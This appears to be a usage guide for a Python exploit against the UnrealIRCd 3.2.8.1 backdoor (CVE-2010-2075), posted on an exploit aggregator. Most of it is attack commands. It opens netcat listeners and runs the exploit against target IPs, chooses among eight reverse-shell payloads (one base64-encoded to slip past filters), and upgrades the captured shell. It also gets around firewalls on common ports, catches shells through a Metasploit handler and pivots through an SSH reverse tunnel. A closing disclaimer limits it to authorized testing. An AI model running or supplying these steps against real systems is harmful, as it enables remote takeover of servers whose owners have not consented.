Exploit for Improper Input Validation in Unrealircd CVE-2010-2075

## https://sploitus.com/exploit?id=D6DE2329-BFD8-5B97-936E-51147200F1A3
# UnrealIRCD 3.2.8.1 Backdoor Exploit

A clean, flexible exploit for CVE-2010-2075 with multiple payload methods and command-line arguments.

## Quick Start

### Basic Usage
```bash
# Start your listener
nc -lvnp 4444

# Run exploit with method 1 (Bash TCP)
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 1
```

## Command-Line Arguments

```
Required:
  -t, --target      Target IP address
  -l, --lhost       Local IP for reverse shell

Optional:
  -p, --port        Target port (default: 6667)
  -lp, --lport      Local port for reverse shell (default: 4444)
  -m, --method      Exploit method to use (1-8 or "all")
  --list-methods    List available exploit methods
```

## Available Methods

| Method | Description | Best For |
|--------|-------------|----------|
| 1 | Bash TCP redirect | Modern Linux systems with bash |
| 2 | SH with file descriptors | Systems with limited bash |
| 3 | Netcat with named pipe | Systems without nc -e support |
| 4 | Traditional netcat | Systems with nc -e flag |
| 5 | Base64 encoded payload | Bypassing input filtering |
| 6 | Python reverse shell | Systems with Python installed |
| 7 | Perl reverse shell | Systems with Perl installed |
| 8 | PHP reverse shell | Systems with PHP installed |
| all | Try all methods | When unsure which will work |

## Usage Examples

### List Available Methods
```bash
python3 unreal_exploit_final.py --list-methods
```

### Use Specific Method
```bash
# Method 1 - Bash TCP (recommended first try)
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 1

# Method 3 - Netcat FIFO (works on most systems)
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 3

# Method 6 - Python reverse shell
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 6
```

### Custom Ports
```bash
# Custom target port and listener port
python3 unreal_exploit_final.py -t 192.168.109.120 -p 6667 -l 192.168.45.235 -lp 443 -m 1
```

### Try All Methods
```bash
# Automatically try all methods with 5-second delays
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m all
```

## Complete Attack Flow

### Step 1: Start Listener
```bash
nc -lvnp 4444
```

### Step 2: Run Exploit
```bash
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 1
```

### Step 3: Interact with Shell
Once connected, you can stabilize the shell:
```bash
# Upgrade to interactive TTY
python -c 'import pty; pty.spawn("/bin/bash")'

# Background with Ctrl+Z, then:
stty raw -echo; fg

# Set terminal type
export TERM=xterm

# Set shell prompt
export SHELL=/bin/bash
```

## Troubleshooting

### No Connection Received

**Check Listener**
```bash
# Verify listener is running
netstat -tlnp | grep 4444
```

**Test Network Connectivity**
```bash
# Can target reach you?
# On target (if you have access):
nc -zv YOUR_IP 4444

# Can you reach target?
nc -zv TARGET_IP 6667
```

**Try Different Method**
```bash
# If method 1 fails, try method 3
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 3
```

**Try All Methods**
```bash
# Let the script try all payloads
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m all
```

### Firewall Issues

**Use Common Ports**
```bash
# Try port 80 or 443 (often allowed outbound)
nc -lvnp 443
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -lp 443 -m 1
```

### Wrong IP Address

**Check Your IP**
```bash
# View all interfaces
ip addr show

# Find your active connection IP
ip route get 8.8.8.8 | grep src
```

## Real-World Scenarios

### Scenario 1: Standard Internal Network
```bash
# Target and attacker on same network
nc -lvnp 4444
python3 unreal_exploit_final.py -t 192.168.1.100 -l 192.168.1.50 -m 1
```

### Scenario 2: Through VPN
```bash
# Using VPN interface (tun0)
nc -lvnp 4444
python3 unreal_exploit_final.py -t 10.10.10.5 -l 10.8.0.2 -m 1
```

### Scenario 3: CTF/Lab Environment
```bash
# HTB/THM style box
nc -lvnp 4444
python3 unreal_exploit_final.py -t 10.129.45.120 -l 10.10.14.5 -m 1
```

### Scenario 4: Unsure Which Method Works
```bash
# Try all methods automatically
nc -lvnp 4444
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m all
```

## Advanced Usage

### Using with Metasploit Handler
```bash
# Start Metasploit handler
msfconsole -q
use exploit/multi/handler
set payload cmd/unix/reverse
set LHOST 192.168.45.235
set LPORT 4444
exploit -j

# Run exploit
python3 unreal_exploit_final.py -t 192.168.109.120 -l 192.168.45.235 -m 1
```

### Port Forwarding Scenario
```bash
# If target can't reach you directly, set up port forward
ssh -R 4444:localhost:4444 intermediate_host

# Start listener on intermediate host
nc -lvnp 4444

# Use intermediate host IP in exploit
python3 unreal_exploit_final.py -t 192.168.109.120 -l INTERMEDIATE_IP -m 1
```

## Tips for Success

1. **Always start listener BEFORE running exploit**
2. **Use method 1 or 3 as first attempts** (most reliable)
3. **If one method fails, try method 3** (Netcat FIFO works on most systems)
4. **Check your IP is correct** (use `ip addr` or `ifconfig`)
5. **Try common ports** (80, 443, 53) if firewall is blocking
6. **Use "all" methods** if unsure which will work

## Vulnerability Details

- **CVE**: CVE-2010-2075
- **OSVDB**: 65445
- **Affected**: UnrealIRCD 3.2.8.1
- **Backdoor Period**: November 2009 - June 12, 2010
- **Trigger**: Backdoor listens for commands prefixed with "AB;"

## Legal Disclaimer

**FOR AUTHORIZED TESTING ONLY**

This tool is for educational purposes and authorized penetration testing only. Unauthorized access to computer systems is illegal. Always obtain explicit written permission before testing.

## References

- [CVE-2010-2075](https://vulners.com/cve/CVE-2010-2075)
- [Unreal Security Advisory](http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt)
- [Metasploit Module](https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/)